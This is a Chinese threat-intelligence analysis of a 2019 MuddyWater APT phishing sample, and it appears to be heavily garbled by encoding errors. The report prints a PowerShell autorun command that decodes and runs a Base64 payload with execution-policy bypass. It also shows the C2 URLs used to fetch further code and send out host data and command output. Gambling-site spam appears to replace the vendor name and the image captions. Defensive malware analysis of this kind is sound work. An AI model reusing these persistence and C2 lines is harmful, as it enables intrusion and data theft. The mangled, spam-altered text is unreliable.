MuddyWater£¨ÎÛË®£©×îй¥»÷ÑùÌìÖ°Îö

Ðû²¼Ê±¼ä 2019-05-10
MuddyWaterÊÇÒ»¸öÀ´×ÔÓÚÒÁÀʵÄÖ÷ÒªÕë¶ÔÖж«µØÓò½øÐй¥»÷µÄAPT×éÖ¯£¬Æä¹¥»÷Ä¿±êÖ÷Òª¼¯ÖÐÓÚÕþ¸®¡¢µçÐż°ÄÜÔ´µÈÁìÓò¡£

½üÈÕ£¬¶¶È¦Îª¶Ä¶øÉú½ð¾¦Äþ¾²Ñо¿ÍŶÓͨ¹ýVenusEyeÍþвÇ鱨ÖÐÐÄá÷ÁÔϵͳ²¶×½µ½Ò»¸ö¿ÉÒÉÎĵµ£¬¾­¹ý·ÖÎöÈ·ÈÏÆäΪMuddyWater×îй¥»÷Ñù±¾¡£


ÔØºÉ·ÖÎö


¹¥»÷Ñù±¾ÎªÒ»¸öWordÎĵµ£¬´ò¿ªºó»áÏÔʾÈçÏÂͼƬ£¬ÓÕʹÊܺ¦Õ߯ôÓúê¡£

×ðÁú¶¶È¦ - Ϊdu¶øÉú

ºê´úÂëÖ´Ðк󣬻áÊÍ·Åc:\programdata\SysTextEnc.iniÎļþ¡£¸ÃÎļþÄÚÈÝΪһ´®Base64±àÂëÊý¾Ý¡£

È»ºóÏòÆô¶¯ÏîдÈëÈçÏÂÃüÁîÐУº
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

ÓÃÓÚ¿ª»ú½âÃܲ¢Ö´ÐÐc:\programdata\SysTextEnc.iniÎļþ¡£½âÃÜÖ®ºóΪһ¶Îpowershell´úÂ룬¸Ã´úÂëÓÃÓÚÇëÇóhxxp://38.132.99.167/crf.txtÁ´½ÓµÄÊý¾Ý²¢Ö´ÐУ¬¸ÃÁ´½Ó·µ»ØµÄÊý¾ÝÈÔÈ»ÊÇÒ»¶ÎPowershell´úÂë¡£
 

×ðÁú¶¶È¦ - Ϊdu¶øÉú



ľÂí·ÖÎö


ÉÏÊö¹ý³ÌÖÐÏÂÔØµÄPowershell´úÂë¼´MuddyWater×éÖ¯¹ßÓõÄpowershellľÂí¡£

½â»ìÏýºó£¬ÆäÖ÷º¯ÊýÈçÏÂËùʾ£º

×ðÁú¶¶È¦ - Ϊdu¶øÉú

ÒÀ´ÎÖ´ÐÐwlChecul£¬pmrHlsl£¬GECOANOO£¬gfxEcmdascrsltpÕâËĸöº¯Êý¡£ÆäÖÐwlCheculÖ»ÊÇΪÁËÈ·ÈÏ·þÎñÆ÷×¼±¸×´Ì¬¡£½á¹¹ÈçÏÂURL²¢ÒÔPOST·½Ê½·¢ËÍÇëÇó£º
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

Èç¹û·µ»ØÖµ²»Îª¿ÕÇÒ²»Îª%COPYTHAT%²Å»áÖ´ÐкóÐøº¯Êý¡£Ö®ºóÖ´ÐÐpmrHlslº¯Êý£¬¸Ãº¯Êý»áµ÷ÓÃWMI»ñÈ¡¶àÖÖ¼ÆËã»úÐÅÏ¢¡£
 
×ðÁú¶¶È¦ - Ϊdu¶øÉú

½«»ñµÃµÄÐÅϢʹÓá°*¡±½øÐÐÆ´½Ó¡£¼ÆËãÆ´½Óºó×Ö·û´®µÄMD5£¬Ôٺ͡°*1997* EP1¡±½øÐÐÆ´½Ó£¬×îºó½øÐÐbase64±àÂë¡£

×ðÁú¶¶È¦ - Ϊdu¶øÉú
 
Ö®ºó½«½á¹¹³öÀ´µÄBase64±àÂëÊý¾ÝÆ´½Ó³ÉÈçÏÂURL²¢ÒÔPOST·½Ê½·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

Èç¹û·µ»Ø½á¹û²»Îª¿Õ¶øÇÒ²»Îª%BYE%Ôò¼ÌÐøºóÐøº¯ÊýµÄÖ´ÐС£½ÓÏÂÀ´ÒªÖ´Ðеĺ¯ÊýΪGECOANOO¡£

GeCOANOOº¯Êý½á¹¹ÈçÏÂÊý¾Ý£¬²¢ÒÔPOST·½Ê½½«Æä·¢ËͳöÈ¥£º
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

ÆäÖеÄEncryptedData¼´ÉÏÒ»´Î·¢ËÍÊý¾ÝÖнøÐÐBase64±àÂëµÄMD5²¿ÃÅ¡£Èç¹û·µ»Ø½á¹û²»Îª¿ÕÇÒ·µ»ØÖµ¾­¹ýbase64½âÂëºó²»Îª"SHH"£¬Ôò½«½âÂëºóµÄ·µ»ØÖµ¸³Öµ¸øÒ»¸öÈ«¾Ö±äÁ¿gecdrEu£¬È»ºóÖ´ÐÐÏÂÒ»¸öº¯Êý£¬¿ÉÒÔÅжϸ³Öµ¸øgecdrEuµÄÊý¾ÝΪһ¶Îpowershell´úÂë¡£
 
×ðÁú¶¶È¦ - Ϊdu¶øÉú

×îºóͨ¹ýgfxEcmdascrsltpº¯ÊýÖ´ÐÐÈ«¾Ö±äÁ¿ÖеÄgecdrEuÖеÄpowershell´úÂë¡£
 
×ðÁú¶¶È¦ - Ϊdu¶øÉú

²¢½«·µ»ØÖµ½øÐÐbase64±àÂ룬ƴ´Õ³ÉÈçϵÄURL¸ñʽ½øÐÐÉÏ´«¡£
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]


ËÝÔ´·ÖÎö


ͨ¹ýVenusEyeÍþвÇ鱨ÖÐÐĹØÁªÏµÍ³£¬ÎÒÃÇ·¢ÏÖÁËÁíÒ»¸öÔçÆÚµÄÑù±¾¡£

×ðÁú¶¶È¦ - Ϊdu¶øÉú

¸ÃÑù±¾ËùʹÓõļ¼Êõ¶¼Óë±¾´ÎÎÒÃÇ·¢ÏÖµÄÑù±¾Èç³öÒ»ÕÞ¡£

ͨ¹ýËÝÔ´·ÖÎö£¬ÎÒÃÇ·¢ÏÖÕâÁ½¸öÑù±¾¶¼ÓëÓÑÉÌ4ÔÂ10ÈÕÔÚÉ罻ýÌåÉÏÅû¶µÄMuddyWater¹¥»÷ÍÁ¶úÆäµÄÑùµ×Ï¸ËÆ¡£ÏÂÃæÊÇÁ½Õߵĺê´úÂë¶Ô±È¡£

×ðÁú¶¶È¦ - Ϊdu¶øÉú


×ðÁú¶¶È¦ - Ϊdu¶øÉú


ͨ¹ý¶Ô±È¿ÉÒÔ·¢ÏÖ£¬¶þÕß¶¼Ê¹ÓÃÏàͬµÄ·½Ê½»ñÈ¡¼ÆËã»úÐÅÏ¢£¬È»ºóʹÓÃÏàͬµÄ¼ÆË㷽ʽ¼ÆËãÊܺ¦ÕßÖ÷»úµÄΨһ±êʶ¡£

 

×ðÁú¶¶È¦ - Ϊdu¶øÉú


Ïà±È֮ϣ¬ÔçÆÚ·¢ÏÖµÄÑù±¾½«ÉÏÏßÇëÇó¡¢»ñÈ¡powershell´úÂë¡¢ÉÏ´«ÃüÁîÐÐÖ´Ðнá¹û²ð·Ö³É²îÒìPHP½øÐн»»¥¡£¶øÏÖÔڵİ汾ÔòʹÓÃͬһ¸öPHPÎļþ½øÐн»»¥¡£¶øÇÒÔçÆÚ°æ±¾Èç¹ûÔÚÖ´Ðйý³ÌÖÐÓöµ½´íÎó£¬Ôò»á½«´íÎóÐÅÏ¢¼Ç¼ÈÕÖ¾£¬µ«ÊÇ×îа汾ÔòÖ±½Ó½áÊøµ±Ç°·¨Ê½¡£

¶ÔÓÚÖ´ÐÐÁ÷³ÌÀ´Ëµ£¬×îаæµ×ϸ¶ÔÓÚÔçÆÚ°æ±¾Ò²Óнϴó²îÒ죬¶þÕßµÄÖ´ÐÐÁ÷³ÌÈçÏ£º

×ðÁú¶¶È¦ - Ϊdu¶øÉú


×ðÁú¶¶È¦ - Ϊdu¶øÉú
 
Ïà±È֮ϣ¬×îÐµĹ¥»÷»î¶¯Ôö¼ÓÁËÆä»ù´¡ÉèÊ©£¬¶øÇÒ½«Ö÷Ìå´úÂë·ÅÖõ½Ô¶³Ì·þÎñÆ÷Öжø²»ÊÇÖ±½Óͨ¹ýµöÓãÎĵµÊͷŵ½µ±µØ¡£¿ÉÒÔ¿´³ö¸Ã×éÖ¯ÔÚ²»Í£µÄ¸üÐÂÆä¹¥»÷·½Ê½ºÍ·À¼ì²â·½Ê½¡£



×ܽá


MuddyWater×éÖ¯×ÔÅû¶֮ÔÂË·Ö±»îÔ¾ÖÁ½ñ£¬¸Ã×éÖ¯·Ç³£ÇàíùʹÓÃPowershell½ÅÔ­À´±àдÆä¹¥»÷¹¤¾ß£¬²¢ÑÜÉú³öÁ˸Ã×éÖ¯µÄרÓÐľÂíPOWERSTATS¡£ËäÈ»¸Ã×éÖ¯µÄPowershellľÂí¸üл»´úºÜ¿ì£¬µ«ÊÇÎÒÃÇÈÔÄÜ´ÓÆäpowershell´úÂëÖп´µ½Ð©ÐíPOWERSTATSµÄÓ°×Ó¡£


Íþвָ±ê£¨IOC£©


97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt


½â¾ö·½°¸


1¡¢¶¶È¦Îª¶Ä¶øÉúVenusEyeÍþвÇ鱨ÖÐÐÄÒѾ­Ö§³Ö¶Ô±¾´Î¹¥»÷»î¶¯Ïà¹ØÇ鱨µÄ²éѯ¡£

2¡¢ ÒѲ¿Êð¶¶È¦Îª¶Ä¶øÉúIDS¡¢IPS²úÎïµÄ¿Í»§ÇëÉý¼¶Ê¼þ¿âµ½×îа汾£¬¼´¿ÉÓÐЧ¼ì²â»ò×è¶Ï¹¥»÷¡£

3¡¢ ÒѲ¿Êð¶¶È¦Îª¶Ä¶øÉúAPT¼ì²â²úÎïµÄ¿Í»§ÎÞÐèÉý¼¶£¬¼´¿ÉÓÐЧ¼ì²â´Ë´Î¹¥»÷¡£

 

×ðÁú¶¶È¦ - Ϊdu¶øÉú